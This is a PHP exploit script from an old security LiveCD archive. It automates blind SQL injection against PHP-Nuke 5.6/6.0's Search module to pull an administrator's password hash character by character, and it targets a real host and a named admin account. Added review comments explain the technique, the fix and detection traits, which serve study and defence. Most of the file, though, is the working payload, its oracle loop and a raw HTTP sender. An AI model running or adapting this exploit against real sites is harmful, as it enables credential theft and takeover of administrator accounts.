/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / phpbb / PHPNukeAutoSelectFishAttacker.php < prev    next >
PHP Script  |  2005-02-12  |  2KB  |  86 lines

<?php

########## PHPnuke Auto-SelectFish Attacker
########## David@cgishield.com
########## works on phpnuke 5.6 and 6.0

// To use this program, simply upload it to a php enabled webserver, and execute
// If php times out before the whole password hash is determined,
// adjust the maximum script execution time in php.ini
// Also, replace following with correct values:

// Review summary (defensive reading of this listing):
//  * Technique: boolean-based blind SQL injection. The request below appends
//    "and mid(a.pwd,<pos>,1)=char(<code>)" to the numeric `days` field of the
//    Search module and reads one bit per request from whether the response
//    contains "No matches found to your query".
//  * Root cause, presumably: the server places `days` into its SQL statement
//    without forcing it to an integer. The server code is not shown here, so
//    confirm against the affected release. The fix is an integer cast or a
//    bound parameter for `days`, not quote escaping.
//  * Volume: 32 positions x up to 16 candidates = at most 512 POST requests.
//  * Detection: repeated POSTs to /modules.php with name=Search whose `days`
//    value contains anything other than digits (here "and", "mid(", "char(").

// Target host and the script path that receives the POST.
$server="www.phpnuke.org";
$script="/modules.php";

// Title of a story created specifically by the admin who is being hacked.
// Together with the author filter it makes the search return a match only
// when the appended condition is true.
$data_to_match="Revolution";
$admin_account_name="nukelite";
// Character positions tested: the loop below runs from $beginchar up to, but
// not including, $endchar, i.e. positions 1..32. With the hex-only alphabet
// below, that is the length of a hex-encoded MD5 digest; presumably the stored
// value is an unsalted MD5 (TODO confirm against the phpnuke schema).
$beginchar="1";
$endchar="33";



// Both values are placed in a form-encoded body, so they are URL-encoded first.
$admin_account_name=urlencode($admin_account_name);
$data_to_match=urlencode($data_to_match);

// Candidate alphabet 0-9a-f, each written as a SQL char(<ASCII code>) call.
// Presumably chosen so the payload carries no quote characters; quote escaping
// alone therefore does not protect a numeric parameter.
// NOTE(review): keys a..f are unquoted bare words; this relies on legacy PHP
// treating an undefined constant as a string.
$checkchar[0]="char(48)";
$checkchar[1]="char(49)";
$checkchar[2]="char(50)";
$checkchar[3]="char(51)";
$checkchar[4]="char(52)";
$checkchar[5]="char(53)";
$checkchar[6]="char(54)";
$checkchar[7]="char(55)";
$checkchar[8]="char(56)";
$checkchar[9]="char(57)";
$checkchar[a]="char(97)";
$checkchar[b]="char(98)";
$checkchar[c]="char(99)";
$checkchar[d]="char(100)";
$checkchar[e]="char(101)";
$checkchar[f]="char(102)";

// Outer loop: one iteration per character position of the stored value.
for($i=$beginchar;$i<$endchar;$i++){
reset($checkchar);
// Inner loop: try each candidate until one is accepted. each() and eregi()
// are legacy-era PHP functions that were removed from later PHP releases.
while (list($i2, $i2val) = @each($checkchar)){

// Search-module form body. `days` is the injected field; "+" is a
// form-encoded space.
$vars="name=Search&query=$data_to_match&topic=&category=&author=$admin_account_name&days=1000+and+mid(a.pwd,$i,1)=$checkchar[$i2]&type=stories";
$data=sendToHost("$server",'post',"$script","$vars");

// Oracle: the "no matches" text means the appended condition was false.
if (eregi("No matches found to your query","$data")){

}
else{

// Any response without that text is treated as a hit: print position and
// character, then move on to the next position.
echo("<br>$i= $i2"); flush();break;}

}

}
  60.  
  61.  
/**
 * Sends one hand-built HTTP/1.1 request over a plain TCP socket to port 80
 * and returns everything read back from the socket.
 *
 * @param $host      Used both as the connection target and as the Host header.
 * @param $method    Upper-cased before use; the body is written only for POST.
 * @param $path      Request path placed on the request line.
 * @param $data      Request body; Content-length is always derived from it.
 * @param $useragent When truthy, a "User-Agent: Mozilla" header is sent.
 * @return The response, headers and body together, as one string.
 *
 * NOTE(review): the fsockopen() result is never checked, no timeout is
 * passed, and $buf is appended to without being initialised.
 *
 * Detection notes: every header line ends in a bare "\n" where HTTP specifies
 * CRLF, the User-Agent is the literal string "Mozilla", and each request
 * carries "Connection: close". Those traits are visible in a proxy, WAF or
 * packet capture.
 */
function sendToHost($host,$method,$path,$data,$useragent=1)
{
$method = strtoupper($method);
// Plain-text connection, fixed to port 80.
$fp = fsockopen($host,80);
fputs($fp, "$method $path HTTP/1.1\n");
fputs($fp, "Host: $host\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\n");
fputs($fp, "Content-length: " . strlen($data) . "\n");
if ($useragent)
fputs($fp, "User-Agent: Mozilla\n");
// The blank line after this header ends the header section.
fputs($fp, "Connection: close\n\n");
if ($method == 'POST')
fputs($fp, $data);
// Read until the server closes the connection, up to 127 bytes per fgets() call.
while (!feof($fp))
$buf .= fgets($fp,128);
fclose($fp);
// Empty 100-iteration loop: it has no body and does no work.
for($slow=0;$slow<100;$slow++){}

return $buf;
}
  82.  
  83.  
  84. ?>
  85.  
  86.